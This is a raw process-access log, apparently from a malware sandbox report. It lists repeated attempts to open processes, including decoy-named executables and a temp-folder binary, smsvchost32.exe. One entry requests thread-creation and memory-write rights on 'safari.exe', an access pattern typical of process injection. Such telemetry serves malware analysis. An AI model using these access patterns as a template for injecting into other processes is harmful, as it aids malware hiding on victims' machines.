1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
170 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\locationnotificationwindows.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
5 | |
| Open | c:\windows\system32\locationnotificationwindows.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
169 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\locationnotificationwindows.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
242 | |
| Open | c:\windows\system32\locationnotificationwindows.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
108 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
121 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
